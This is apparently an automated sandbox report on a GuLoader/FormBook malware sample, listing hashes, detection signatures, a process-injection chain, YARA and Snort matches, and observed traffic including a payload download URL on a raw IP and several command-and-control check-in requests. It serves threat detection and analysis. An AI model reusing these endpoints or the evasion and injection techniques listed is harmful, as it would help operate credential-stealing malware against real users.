
Analysis Report dwg.exe

Overview

General Information

Sample Name: dwg.exe
Analysis ID: 358411
MD5: 6a9035b7435c6aa9e6c8e31cf771e316
SHA1: 16a6d2ac44b8ac3cbe112916d8cd9912d3f0dbf7
SHA256: 6f33f5e3a23420dacdc26fb8e2eef07fe482e634d4b832b0917cbe7ed37864f5
Tags: exe, GuLoader

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • dwg.exe (PID: 5316 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 6A9035B7435C6AA9E6C8E31CF771E316)
    • dwg.exe (PID: 1544 cmdline: 'C:\Users\user\Desktop\dwg.exe' MD5: 6A9035B7435C6AA9E6C8E31CF771E316)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • rundll32.exe (PID: 6456 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 6492 cmdline: /c del 'C:\Users\user\Desktop\dwg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166d9:$sqlite3step: 68 34 1C 7B E1
    • 0x167ec:$sqlite3step: 68 34 1C 7B E1
    • 0x16708:$sqlite3text: 68 38 2A 90 C5
    • 0x1682d:$sqlite3text: 68 38 2A 90 C5
    • 0x1671b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16843:$sqlite3blob: 68 53 D8 7F 8C
0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth
    • 0x4eb8:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: dwg.exe; ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match; File source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY
Source: 13.2.rundll32.exe.4927960.5.unpack; Avira: Label: TR/Dropper.Gen
Source: 13.2.rundll32.exe.6843e8.1.unpack; Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: dwg.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP; source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: dwg.exe, 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: dwg.exe, rundll32.exe
Source: Binary string: rundll32.pdb; source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL; source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb; source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.5:49716 -> 45.153.203.33:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: global traffic; HTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=mfN0nzHASLUjgM40ULkNQnoCovlHM9uH9yFdN4Wj+dx/VksqViu7/Odvkv5yi/Rll5ca HTTP/1.1 | Host: www.buytgp.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /gzjz/?iB=oFIukkgM6y8fCONc3B59jjyts4roz7ytDuYjBu/uDkaJWnvjVls8NePE6jnmXGkyfPJd&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1 | Host: www.delmarranch.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /gzjz/?iB=qjvGcpBS9gngfccxw5QFty+eEZUVlIKAvl6NE25MOMcyD1XOvUK5P6Mu22Y8HvedKP3a&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1 | Host: www.apkiinsurance.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=4eJRf0meEh2QJsIJtqwHLZ+h6O4A+owpHjBhWLLxb5QgRA1fgcKJhCeYJGmPUuXRH+xS HTTP/1.1 | Host: www.bestcroissantinlondon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /gzjz/?iB=S32aJJ0sM1lMGA6PL+NxQgVajUvS6UEY5ruSj9tLVOKy1xB24owBALJS5TkIZYObRZJu&oH2d=YT8xZdXh-8LPDX3 HTTP/1.1 | Host: www.thakehamwesthorsley.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=+eUL5YekDsdiYV5OSGI/Jb/ebpv7GcCbilqfT88LbUbqrYneuemleUowajxm8py8BXmt HTTP/1.1 | Host: www.guillemaudexcellenceauto.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /gzjz/?oH2d=YT8xZdXh-8LPDX3&iB=TH/8bzDuV8AVYKcu6EMjxEP+4967DPJ7e0pyFpPn9x325Irf837GqTHpIaz8sm/pkTRA HTTP/1.1 | Host: www.karatetheokinawaway.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View; IP Address: 192.0.78.25
Source: Joe Sandbox View; ASN Name: AUTOMATTICUS
Source: Joe Sandbox View; ASN Name: HENGTONG-IDC-LLCUS
Source: global traffic; HTTP traffic detected: GET /mb.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: 45.153.203.33 | Cache-Control: no-cache
Source: unknown; TCP traffic detected without corresponding DNS query: 45.153.203.33
Source: unknown; DNS traffic detected: queries for: www.buytgp.com
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Thu, 25 Feb 2021 14:35:24 GMT | Content-Type: text/html | Content-Length: 793 | Connection: close | Data Ascii: <!DOCTYPE html><html lang="en-GB"><head><title>Want your own website? | 123 Reg</title><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><meta http-equiv="Content-Language" content="en-us" /><meta name="ROBOTS" content="NOINDEX, NOFOLLOW"><meta name="description" content="Get online with Website Builder! Create a free 2-page website to go with your new domain. Start now for free, no credit card required!"/> <meta n
Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmp; String found in binary or memory: http://45.153.203.33/
Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmp; String found in binary or memory: http://45.153.203.33/53321935-2125563209-4053062332-1002
Source: dwg.exe; String found in binary or memory: http://45.153.203.33/mb.bin
Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmp; String found in binary or memory: http://45.153.203.33/mb.binI;
Source: dwg.exe, 00000001.00000002.307944925.00000000009F7000.00000004.00000020.sdmp; String found in binary or memory: http://45.153.203.33/mb.bintSkm
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmp; String found in binary or memory: http://www.zhongyicts.com.cn
Source: rundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmp; String found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
Source: rundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmp; String found in binary or memory: https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11; Author: Florian Roth
Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Auto-generated rule - file scan copy.pdf.r11; Author: Florian Roth
Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216329B NtSetInformationThread, NtWriteVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216637E NtResumeThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216180C NtWriteVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216056A EnumWindows, NtSetInformationThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02165DB1 NtProtectVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02160602 NtSetInformationThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02165E08 NtResumeThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02162626 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02162698 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216068A NtSetInformationThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02165F0B NtResumeThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216272A NtWriteVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216279A NtWriteVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02166384 NtResumeThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_021663CA NtResumeThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_0216640E NtResumeThread
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02162831 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\dwg.exe; Code function: 0_2_02165C3B NtResumeThread
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216245B NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166466 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166487 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216288E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021624AE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021664C6 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021624F2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162916 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166533 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02163522 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162557 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166558 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02160540 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166596 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162986 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021605B6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021625B2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165DF8 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2896E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2897A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2895D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2898F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2899A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2896D0 NtCreateKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289760 NtOpenProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A770 NtOpenThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289560 NtWriteFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2895F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A10 NtQuerySection,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2898A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2899D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565D76 NtProtectVirtualMemory,NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056637E NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566466 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056640E NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005664C6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566487 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566558 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566533 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DCF NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DE2 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566596 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DB1 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565E08 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005666EB NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565F0B NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005663CA NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566384 NtSetInformationThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044595D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044596D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044596E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044599A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459560 NtWriteFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044595F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044597A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459820 NtEnumerateKey,
